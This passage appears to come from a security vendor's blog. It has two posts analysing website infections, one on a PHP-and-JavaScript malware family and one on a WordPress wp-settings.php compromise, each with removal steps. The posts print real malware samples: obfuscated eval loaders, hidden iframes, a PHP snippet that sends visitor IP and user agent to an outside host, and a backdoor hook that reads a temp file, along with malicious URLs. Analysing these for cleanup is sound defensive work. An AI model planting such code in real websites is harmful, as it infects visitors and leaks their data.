5a50.5a58a32.5a58a58a57a52.5a49a58.5a58a50.5a20a19.5a59.5a52.5a50a58a52a19.5a22a19.5a24.5a24a19.5a20.5a29.5a51a23a57.5a50.5a58a32.5a58a58a57a52.5a49a58.5a58a50.5a20a19.5a52a50.5a52.5a51.5a52a58a19.5a22a19.5a24.5a24a19.5a20.5a29.5a4.5a4.5a4.5a50a55.5a49.5a58.5a54.5a50.5a55a58a23a51.5a50.5a58a34.5a54a50.5a54.5a50.5a55a58a57.5a33a60.5a42a48.5a51.5a39a48.5a54.5a50.5a20a19.5a49a55.5a50a60.5a19.5a20.5a45.5a24a46.5a23a48.5a56a56a50.5a55a50a33.5a52a52.5a54a50a20a51a20.5a29.5a4.5a4.5a62.5';n=n
['split']('a');for(i=0;i!=n.length;i++)if(!+b)ss+=s.fromCharCode(-h*eval("n"+"[i]"));if(a.nodeValue==321)eval(ss);</script><iframe style="visibility:
hidden; position: absolute; left: 0pt; top: 0pt;" src="hxxp://m-e.crossfi tha rlem.net/z/st1" height="10" width="10"></iframe></body></html>

What does the malware do?
Malicious code (PHP) like that below has been found on the compromised websites.

The code executes in two phases:

1. The code below transfers information (user agent, IP address, etc…) to conqstat.com.
2. The Javascript mentioned above is returned as a reply.

Malware sample (PHP):

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics
        $stCurlLink = base64_decode( 'aHR0cDovL2NvbnFzdGF0LmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink );
[snipped...]
?>

How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

Report, Security blacklisting, javascript, malware, simplemachines

Malicious hackers are continuing to find new ways to infect benign websites. A recent spate of attacks on WordPress powered sites proves this more strongly than ever.

One popular method for infecting WordPress powered websites is to infect a file called “wp-settings.php”. The malware is then spread from this file to all subsequent requests for webpages on the compromised website.

The malware
Usually the malware shown below will appear at the top of the page in the section of a webpage. Please check your source code.

Malware sample:

<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k1||e(c)}k=[function(e){return d[e]}];e=function(){
...snipped..
t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie |toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|ph
</script>

Steps to remove the malware

1. Access your hosting account SSH or SFTP
2. Remove the malware inserted into the file “wp_inc/upd.php” located in your “/tmp” folder or in your WordPress installation directory. NOTE: Some of our readers have reported that the malware can also reside in a file called revisions-js.php, so please search in this file too. (Thanks to our readers! )
3. Remove the following code from the file “wp-settings.php”, usually found in your WordPress installation directory

function check_wordpress(){
$t_d = sys_get_temp_dir();
if(file_exists($t_d . ‘/wp_inc’)){
readfile($t_d . ‘/wp_inc’);
}
}
add_action(‘wp_head’, ‘check_wordpress’);
do_action( ‘init’ );

What does the malware do?
Th injected PHP code causes your WordPress installation to load the malware located inside a file named “wp_inc/upd.php” (usually in your “/tmp” folder). The malware then builds an Iframe element pointing to one of many different websites.

Malware destination sites:

hxxp://juyfdjhdjdgh.nl.ai/showthread.php
hxxp://myftp.org/
hxxp://coom.in/

How did this happen?
One of the primary vectors for an attack like this one is stolen user credentials. Do not store your user name and passwords in your FTP client or other similar applications like FileZilla.

Additionally, make sure your WordPress install is up-to-date and that all third party plugins, like timthumb are updated too.

How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

News, Report, Security blacklisting, dean edwards, malware, packed, packer, Wordpress